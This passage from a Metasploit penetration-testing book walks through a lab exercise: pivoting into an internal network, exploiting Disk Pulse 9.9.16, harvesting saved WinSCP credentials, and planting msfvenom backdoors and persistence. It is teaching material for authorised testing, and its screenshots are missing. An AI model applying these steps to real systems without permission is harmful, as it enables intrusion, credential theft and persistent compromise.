Having gathered an enormous amount of detail on the target, is it a good time to start reporting? Not yet. A good penetration tester gains access to the system, obtains the highest level of access, and presents his analysis. However, a great penetration tester does the same but never stops on a single system. They will try with the best of his abilities to dive into the internal network and gain more access to the network (if allowed). Let's use some of the commands which will aid us in pivoting to the internal network. One such example command is
arp, which lists down all the contracted systems in the internal network:
We can see the presence of a separate network, which is in the
192.168.116.0 range. Let's issue the
ifconfig command and see if there is another network adapter attached to the compromised host:
Yup! We got it right-there is another network adapter (
Interface 3) which is connected to a separate network range. However, when we try to ping or scan this network from our address range, we are not able to because the network is unreachable from our IP address, which means we need a mechanism that can forward data from our system to the target (otherwise inaccessible) range through the compromised host itself. We call this arrangement pivoting. Therefore, we will add a route to the target range through our gained Meterpreter on the system, and the target systems in the range will see our compromised host as the source originator. Let's add a route to the otherwise unreachable range through Meterpreter, as shown in the following screenshot:
autoroute post-exploitation module from
post/multi/manage directory, we need to specify the target range in the
SUBNET parameter and
SESSION to the session identifier of the Meterpreter through which data would be tunneled. We can see that by running the module, we have successfully added a route to the target range. Let's run the TCP port scanner module from Metasploit and analyze whether we can scan hosts in the target range or not:
We simply run the
portscanner module on the target we found using the
arp command, that is,
192.168.116.133 with ten threads for ports 1-10000, as shown in preceding screenshot:
Success! We can see that port
80 is open. However, our access is limited through Meterpreter only. We need a mechanism where we can run some of our external tools for browsing port
80 through a web browser to understand more about the target application running on port
80. Metasploit offers an inbuilt socks proxy module which we can run and route traffic from our external applications to the target
192.168.116.133 system. Let's use this module as follows:
We simply need to run the
socks4a module residing at the
auxiliary/server path. It will set up a gateway on the local port,
1080, to route the traffic to the target system. Proxying on
127.0.0.1:1080 will forward our browser traffic through the compromised host. However, for external tools, we will need to use
proxychains and configure it by setting the port to
1080. The port for
proxychains can be configured using the
The next thing is to only set this address as a proxy in the browser or use
proxychains as the prefix on all the third-party command-line applications such as Nmap and Metasploit. We can configure the browser, as shown in the following screenshot:
Make sure to remove
127.0.0.1 from the
No Proxy for section. After setting the proxy, we can just browse to the IP address on port
80 and check whether we can reach port
Nice! We can see the application, which says it's a Disk Pulse Enterprise, Software v9.9.16, which is a known vulnerable version. We have plenty of modules for Disk Pulse in Metasploit. Let's make use of one of them, as follows:
The vulnerability lies in parsing the
GET request by the web server component of Disk Pulse 9.9.16. An attacker can craft malicious
GET requests and cause the SEH frame to overwrite, which will cause the attacker to gain complete access to the program's flow. The attacker will gain full access to the system with the highest level of privileges since Disk Pulse runs with Administrator rights.
Let's make use of the vulnerability and exploit the system as follows:
Merely setting the
RHOST and the
LPORT (Gateway port which will allow us access to the successful exploitation of the target), we are ready to exploit the system. We can see that as soon as we run the exploit, we have Meterpreter session
5 opened, which marks a successful compromise of the target. We can verify our list of sessions using the
sessions -i command as follows:
For more information on the vulnerability, refer to: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-13696.
It is always great to look for the various kinds of applications installed on the target system, since some of the apps may have saved credentials to other parts of the network. Enumerating the list of installed applications, we can see that we have WinSCP 5.7, which is a popular SSH and SFTP client. Metasploit can harvest saved credentials from WinSCP software. Let's run theÂ
post/windows/gather/credentials/winscp module and check whether we have some of the saved credentials in the WinSCP software:
Amazing! We have a rescued credential for another host in the network, which is
192.168.116.134. The good news is the saved credentials are for the root account, so if we gain access to this system, it will be with the highest level of privilege. Let's use the found credentials in the
ssh_login module as follows:
Since we already know the username and password, let's set these options for the module along with the target IP address, as shown in the following screenshot:
Bingo! It's a successful login, and Metasploit has gained a system shell on it automatically. However, we can always escalate to the better quality of access using Meterpreter shells. Let's create another backdoor with
msfvenom as follows:
The backdoor will listen for connections on port
1337. However, how do we transfer this backdoor to the compromised host? Remember, we ran the socks proxy auxiliary module and made changes to the configuration? Using the
proxychains keyword as a suffix for most of the tools will force the tool to use the route through
proxychains. So, to transfer such a file, we can make use of
scp as shown in the following screenshot:
We can see that we have successfully transferred the file. Running the matching handler, similarly to what we did for the first system, we will have the connection from the target. Let's have an overview of all the targets and sessions we gained in this exercise as follows:
Throughout this practice real-world example, we compromised three systems and gained the highest possible privileges off them through local exploits, human errors, and exploiting software that runs with the highest possible privileges.
Kali Linux VM Image
Kali Rolling (2017.3) x64
Ubuntu 14.04 LTS
Ubuntu 16.04 LTS
16.04.3 LTS (xenial)
Enterprise Disk Management Software
SSH and SFTP
- We started by conducting an Nmap scan on the target IP address, which is
- The Nmap scan revealed that port
- Next, we did a fingerprint of the application running on port
80and encountered Apache 2.4.7 running.
- We tried browsing to the HTTP port. However, we couldn't find anything.
- We ran the
dir_scannermodule to perform a dictionary-based check on the Apache server and found the PhpCollab application directory.
- We found an exploit module for PhpCollab using
searchsploitand had to import the third-party exploit into Metasploit.
- Next, we exploited the application and gained limited user access to the target system.
- To improve our access mechanism, we uploaded a backdoored executable and achieved a better level of access to the target.
- To gain root access, we run the exploit
suggestermodule and found that the overlayfs privilege escalation exploit will help us achieve root access to the target.
- We downloaded the overlayfs exploit from https://exploit-db.com/, compiled it, and run it to gain root access to the target.
- Using the same previously generated backdoor, we opened another Meterpreter shell, but this time with root privileges.
- We added persistence to the system by using the
sshkey_persistencemodule in Metasploit.
- Running the
arpcommand on the target, we found that there was a separate network connection to the host, which is in the target range of
- We added a route to this network by using the autoroute script.
- We scanned the system found from the
arpcommand using the TCP port scanner module in Metasploit.
- We saw that port
80of the system was open.
- Since we only had access to the target network through Meterpreter, we used the
socks4amodule in Metasploit for making other tools connect to the target through Meterpreter.
- Running the socks proxy, we configured our browser to utilize the
socks4aproxy on port
- We opened
192.168.116.133through our browser and saw that it was running the Disk Pulse 9.9.16 web server service.
- We searched Metasploit for Disk Pulse and found that it was vulnerable to an SEH-based buffer overflow vulnerability.
- We exploited the vulnerability and gained the highest level of privileges on the target since the software runs with SYSTEM-level privileges.
- We enumerated the list of installed applications and found that WinSCP 5.7 is installed on the system.
- We saw that Metasploit contains an inbuilt module to harvest saved credentials from WinSCP.
- We collected the root credentials from WinSCP and used the
ssh_loginmodule to gain a root shell on the target.
- We uploaded another backdoor to gain a Meterpreter shell with root privileges on the target.
Throughout this chapter, we introduced the phases involved in penetration testing. We also saw how we can set up Metasploit and conduct a penetration test on the network. We recalled the basic functionalities of Metasploit as well. We also looked at the benefits of using databases in Metasploit and pivoting to internal systems with Metasploit.
Having completed this chapter, we are equipped with the following:
- Knowledge of the phases of a penetration test
- The benefits of using databases in Metasploit
- The basics of the Metasploit framework
- Knowledge of the workings of exploits and auxiliary modules
- Knowledge of pivoting to internal networks and configuring routes to them
- Understanding of the approach to penetration testing with Metasploit
The primary goal of this chapter was to get you familiar with penetration test phases and the basics of Metasploit. This chapter focused entirely on preparing ourselves for the following chapters.
To make the most out of the knowledge gained from this chapter, you should perform the following exercises:
- Refer to PTES standards and give a deep dive to all the phases of a business-oriented penetration test
- Use the overlayfs privilege escalation module within the Metasploit framework
- Find at least three different exploits which are not a part of Metasploit framework, and load them into Metasploit
- Perform post-exploitation on the Windows 7 system and identify five best post-exploitation modules
- Achieve persistence on Windows 7 by finding the correct persistence mechanism and check if any AV raises any flags while you do that
- Identify at least three persistence methods for Windows, Linux, and Mac operating systems
In the next chapter, we will dive deep into the wild world of scripting and building Metasploit modules. We will learn how we can build cutting-edge modules with Metasploit and learn how some of the most popular scanning and authentication testing scripts work.